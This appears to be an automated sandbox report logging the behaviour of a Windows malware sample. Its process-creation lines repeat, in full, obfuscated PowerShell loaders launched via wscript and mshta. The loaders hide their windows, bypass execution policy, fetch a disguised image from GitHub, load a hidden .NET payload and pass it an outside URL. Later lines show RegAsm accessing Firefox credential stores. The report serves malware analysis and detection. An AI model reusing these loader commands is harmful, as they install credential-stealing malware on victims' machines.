[system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('tg'+'4imageurl = nllhtt'+'ps://'+'raw.githubuserco'+'ntent.com/cryptersandtoolsoficial/zip/refs/he'+'ad'+'s/main/d'+'etahnote_v.jpg nll;tg4webclient = new-object system.net.webclient;tg4imageb'+'ytes = tg4webclient.downloa'+'ddata(tg4imageurl);tg4imagetext = [system.text.encod'+'ing]::utf8.getstring(tg4imagebytes);tg4startflag = nll<<base64_start>>nl'+'l;tg4endflag = nll<<bas'+'e64_end>>nll;t'+'g4startindex = tg4imagetext.indexof(tg4startflag);tg4endindex = tg4imaget'+'ext.indexof(tg4endflag);tg4startindex'+' -g'+'e 0 -and tg4endindex -gt tg4startindex;tg4s'+'tartindex += tg4startflag.length;tg4base64length = tg4endindex - tg4startindex;tg4base64command'+' = tg4imagetext.substring('+'tg4startindex, tg4base64length);tg4commandbytes = [system.convert'+']::f'+'rombase64string(tg4base64command);tg4loadedassembl'+'y = [system.reflection.assembly]::load(tg4commandby'+'te'+'s);tg4vaimethod = [dnlib.io.home].getmethod(nllva'+'inll);tg4vai'+'method'+'.invoke(tg4null, @(nl'+'ltxt.eccfrr/054/04.022.3.291//:ptthnl'+'l, nlldesat'+'ivadon'+'ll, nlldesativadonll, nlldesativadonll, nllregasmnll, nlldesativadonll, nlldesativadonll));').replace('tg4',[string][char]36).replace(([char]78+[char]108+[char]76),[string][char]39) | . ((gv '*mdr*').name[3,11,2]-join'')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jecgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigferc10wvblicagicagicagicagicagicagicagicagicagicagicattuvnykvyzgvmaw5jdglptiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbhbwzscfv0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicague1kwhzolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagrnqsdwludcagicagicagicagicagicagicagicagicagicagicagyxh4c2lbu0hmleludfb0ciagicagicagicagicagicagicagicagicagicagicageehxu3kpoycgicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicaiz3vncgjizudkvyigicagicagicagicagicagicagicagicagicagicagic1oqw1lu1bhy2ugicagicagicagicagicagicagicagicagicagicagig9nenphy015tiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjec6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaundavnduwl3nlzxrozwjlc3rwcmljzxdpdghnb29ky29va2llc21llnrjriisiirfbly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyismcwwkttzvgfsvc1ztgvlucgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyi='+[char]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcd0zycrjzrpbwfnzvvybca9ie5stgh0dccrj3bzoi8vjysncmf3lmdpdgh1ynvzzxjjbycrj250zw50lmnvbs9dcnlwdgvyc0fuzfrvb2xzt2zpy2lhbc9asvavcmvmcy9ozscrj2fkjysncy9tywlul0qnkydldgfotm90zv9wlmpwzybobew7dgc0d2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddt0zzrpbwfnzuinkyd5dgvzid0gdgc0d2viq2xpzw50lkrvd25sb2enkydkrgf0ysh0zzrpbwfnzvvybck7dgc0aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kjysnaw5nxto6vvrgoc5hzxrtdhjpbmcodgc0aw1hz2vcexrlcyk7dgc0c3rhcnrgbgfnid0gtmxmpdxcqvnfnjrfu1rbulq+pk5sjysntdt0zzrlbmrgbgfnid0gtmxmpdxcqvmnkydfnjrfru5epj5obew7dccrj2c0c3rhcnrjbmrleca9ihrnngltywdlvgv4dc5jbmrlee9mkhrnnhn0yxj0rmxhzyk7dgc0zw5ksw5kzxggpsb0zzrpbwfnzvqnkydlehqusw5kzxhpzih0zzrlbmrgbgfnktt0zzrzdgfydeluzgv4jysnic1njysnzsawic1hbmqgdgc0zw5ksw5kzxgglwd0ihrnnhn0yxj0sw5kzxg7dgc0cycrj3rhcnrjbmrlecarpsb0zzrzdgfydezsywcutgvuz3roo3rnngjhc2u2nexlbmd0aca9ihrnngvuzeluzgv4ic0gdgc0c3rhcnrjbmrledt0zzriyxnlnjrdb21tyw5kjysnid0gdgc0aw1hz2vuzxh0lln1ynn0cmluzygnkyd0zzrzdgfydeluzgv4lcb0zzriyxnlnjrmzw5ndggpo3rnngnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydccrj106okynkydyb21cyxnlnjrtdhjpbmcodgc0ymfzzty0q29tbwfuzck7dgc0bg9hzgvkqxnzzw1ibccrj3kgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkhrnngnvbw1hbmrcescrj3rljysncyk7dgc0dmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchobexwqscrj0lobewpo3rnnhzhascrj01ldghvzccrjy5jbnzva2uodgc0bnvsbcwgqchobccrj0x0ehqurundrljslza1nc8wnc4wmjiumy4yotevlzpwdhrotmwnkydmlcbobexkzxnhdccrj2l2ywrvticrj2xmlcbobexkzxnhdgl2ywrvtmxmlcbobexkzxnhdgl2ywrvtmxmlcbobexszwdbc21obewsie5stgrlc2f0axzhzg9obewsie5stgrlc2f0axzhzg9obewpktsnks5srvbsqwnlkcd0zzqnlftzvhjjbkddw2noqxjdmzyplljfugxby2uokftjaefyxtc4k1tjaefyxtewoctby2hbcl03niksw3nucklur11by2hbcl0zoskgfcauicgoz1ygjypnzfiqjykutmftzvszldexldjdlupvsu4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('tg'+'4imageurl = nllhtt'+'ps://'+'raw.githubuserco'+'ntent.com/cryptersandtoolsoficial/zip/refs/he'+'ad'+'s/main/d'+'etahnote_v.jpg nll;tg4webclient = new-object system.net.webclient;tg4imageb'+'ytes = tg4webclient.downloa'+'ddata(tg4imageurl);tg4imagetext = [system.text.encod'+'ing]::utf8.getstring(tg4imagebytes);tg4startflag = nll<<base64_start>>nl'+'l;tg4endflag = nll<<bas'+'e64_end>>nll;t'+'g4startindex = tg4imagetext.indexof(tg4startflag);tg4endindex = tg4imaget'+'ext.indexof(tg4endflag);tg4startindex'+' -g'+'e 0 -and tg4endindex -gt tg4startindex;tg4s'+'tartindex += tg4startflag.length;tg4base64length = tg4endindex - tg4startindex;tg4base64command'+' = tg4imagetext.substring('+'tg4startindex, tg4base64length);tg4commandbytes = [system.convert'+']::f'+'rombase64string(tg4base64command);tg4loadedassembl'+'y = [system.reflection.assembly]::load(tg4commandby'+'te'+'s);tg4vaimethod = [dnlib.io.home].getmethod(nllva'+'inll);tg4vai'+'method'+'.invoke(tg4null, @(nl'+'ltxt.eccfrr/054/04.022.3.291//:ptthnl'+'l, nlldesat'+'ivadon'+'ll, nlldesativadonll, nlldesativadonll, nllregasmnll, nlldesativadonll, nlldesativadonll));').replace('tg4',[string][char]36).replace(([char]78+[char]108+[char]76),[string][char]39) | . ((gv '*mdr*').name[3,11,2]-join'')"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment.exe ; iex($(iex('[system.text.encoding]'+[char]58+[char]58+'utf8.getstring([system.convert]'+[char]58+[char]0x3a+'frombase64string('+[char]34+'jecgicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagigferc10wvblicagicagicagicagicagicagicagicagicagicagicattuvnykvyzgvmaw5jdglptiagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvybg1vtiisicagicagicagicagicagicagicagicagicagicagicbdagfyu2v0id0gq2hhclnldc5vbmljb2rlkv1wdwjsawmgc3rhdgljigv4dgvybibjbnrqdhigvvjmrg93bmxvywrub0zpbguosw50uhryicagicagicagicagicagicagicagicagicagicagicbhbwzscfv0lhn0cmluzyagicagicagicagicagicagicagicagicagicagicague1kwhzolhn0cmluzyagicagicagicagicagicagicagicagicagicagicagrnqsdwludcagicagicagicagicagicagicagicagicagicagicagyxh4c2lbu0hmleludfb0ciagicagicagicagicagicagicagicagicagicagicageehxu3kpoycgicagicagicagicagicagicagicagicagicagicagic1oyu1licagicagicagicagicagicagicagicagicagicagicaiz3vncgjizudkvyigicagicagicagicagicagicagicagicagicagicagic1oqw1lu1bhy2ugicagicagicagicagicagicagicagicagicagicagig9nenphy015tiagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagjec6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xotiumy4ymjaundavnduwl3nlzxrozwjlc3rwcmljzxdpdghnb29ky29va2llc21llnrjriisiirfbly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyismcwwkttzvgfsvc1ztgvlucgzktttvgfsvcagicagicagicagicagicagicagicagicagicagicagiirltly6qvbqrefuqvxzzwv0agvizxn0chjpy2v3axroz29vzgnvb2tpzxntlnziuyi='+[char]0x22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcd0zycrjzrpbwfnzvvybca9ie5stgh0dccrj3bzoi8vjysncmf3lmdpdgh1ynvzzxjjbycrj250zw50lmnvbs9dcnlwdgvyc0fuzfrvb2xzt2zpy2lhbc9asvavcmvmcy9ozscrj2fkjysncy9tywlul0qnkydldgfotm90zv9wlmpwzybobew7dgc0d2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddt0zzrpbwfnzuinkyd5dgvzid0gdgc0d2viq2xpzw50lkrvd25sb2enkydkrgf0ysh0zzrpbwfnzvvybck7dgc0aw1hz2vuzxh0id0gw1n5c3rlbs5uzxh0lkvuy29kjysnaw5nxto6vvrgoc5hzxrtdhjpbmcodgc0aw1hz2vcexrlcyk7dgc0c3rhcnrgbgfnid0gtmxmpdxcqvnfnjrfu1rbulq+pk5sjysntdt0zzrlbmrgbgfnid0gtmxmpdxcqvmnkydfnjrfru5epj5obew7dccrj2c0c3rhcnrjbmrleca9ihrnngltywdlvgv4dc5jbmrlee9mkhrnnhn0yxj0rmxhzyk7dgc0zw5ksw5kzxggpsb0zzrpbwfnzvqnkydlehqusw5kzxhpzih0zzrlbmrgbgfnktt0zzrzdgfydeluzgv4jysnic1njysnzsawic1hbmqgdgc0zw5ksw5kzxgglwd0ihrnnhn0yxj0sw5kzxg7dgc0cycrj3rhcnrjbmrlecarpsb0zzrzdgfydezsywcutgvuz3roo3rnngjhc2u2nexlbmd0aca9ihrnngvuzeluzgv4ic0gdgc0c3rhcnrjbmrledt0zzriyxnlnjrdb21tyw5kjysnid0gdgc0aw1hz2vuzxh0lln1ynn0cmluzygnkyd0zzrzdgfydeluzgv4lcb0zzriyxnlnjrmzw5ndggpo3rnngnvbw1hbmrcexrlcya9ifttexn0zw0uq29udmvydccrj106okynkydyb21cyxnlnjrtdhjpbmcodgc0ymfzzty0q29tbwfuzck7dgc0bg9hzgvkqxnzzw1ibccrj3kgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkhrnngnvbw1hbmrcescrj3rljysncyk7dgc0dmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchobexwqscrj0lobewpo3rnnhzhascrj01ldghvzccrjy5jbnzva2uodgc0bnvsbcwgqchobccrj0x0ehqurundrljslza1nc8wnc4wmjiumy4yotevlzpwdhrotmwnkydmlcbobexkzxnhdccrj2l2ywrvticrj2xmlcbobexkzxnhdgl2ywrvtmxmlcbobexkzxnhdgl2ywrvtmxmlcbobexszwdbc21obewsie5stgrlc2f0axzhzg9obewsie5stgrlc2f0axzhzg9obewpktsnks5srvbsqwnlkcd0zzqnlftzvhjjbkddw2noqxjdmzyplljfugxby2uokftjaefyxtc4k1tjaefyxtewoctby2hbcl03niksw3nucklur11by2hbcl0zoskgfcauicgoz1ygjypnzfiqjykutmftzvszldexldjdlupvsu4njyk=';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('tg'+'4imageurl = nllhtt'+'ps://'+'raw.githubuserco'+'ntent.com/cryptersandtoolsoficial/zip/refs/he'+'ad'+'s/main/d'+'etahnote_v.jpg nll;tg4webclient = new-object system.net.webclient;tg4imageb'+'ytes = tg4webclient.downloa'+'ddata(tg4imageurl);tg4imagetext = [system.text.encod'+'ing]::utf8.getstring(tg4imagebytes);tg4startflag = nll<<base64_start>>nl'+'l;tg4endflag = nll<<bas'+'e64_end>>nll;t'+'g4startindex = tg4imagetext.indexof(tg4startflag);tg4endindex = tg4imaget'+'ext.indexof(tg4endflag);tg4startindex'+' -g'+'e 0 -and tg4endindex -gt tg4startindex;tg4s'+'tartindex += tg4startflag.length;tg4base64length = tg4endindex - tg4startindex;tg4base64command'+' = tg4imagetext.substring('+'tg4startindex, tg4base64length);tg4commandbytes = [system.convert'+']::f'+'rombase64string(tg4base64command);tg4loadedassembl'+'y = [system.reflection.assembly]::load(tg4commandby'+'te'+'s);tg4vaimethod = [dnlib.io.home].getmethod(nllva'+'inll);tg4vai'+'method'+'.invoke(tg4null, @(nl'+'ltxt.eccfrr/054/04.022.3.291//:ptthnl'+'l, nlldesat'+'ivadon'+'ll, nlldesativadonll, nlldesativadonll, nllregasmnll, nlldesativadonll, nlldesativadonll));').replace('tg4',[string][char]36).replace(([char]78+[char]108+[char]76),[string][char]39) | . ((gv '*mdr*').name[3,11,2]-join'')"
                  Source: RegAsm.exe, 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerChrome51082_10142024 [Compatibility Mode]
                  Source: RegAsm.exe, 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: RegAsm.exe, 00000014.00000002.649655222.0000000000871000.00000004.00000020.00020000.00000000.sdmp, logs.dat.20.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_10002933 cpuid 20_2_10002933
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,31_2_0045201B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,31_2_004520B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,31_2_00452143
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,31_2_00452393
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,31_2_00448484
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,31_2_004524BC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,31_2_004525C3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,31_2_00452690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoW,31_2_0044896D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: GetLocaleInfoA,31_2_0040F90C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: IsValidCodePage,GetLocaleInfoW,31_2_00451D58
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: EnumSystemLocalesW,31_2_00451FD0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_64\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 20_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,20_2_10002264
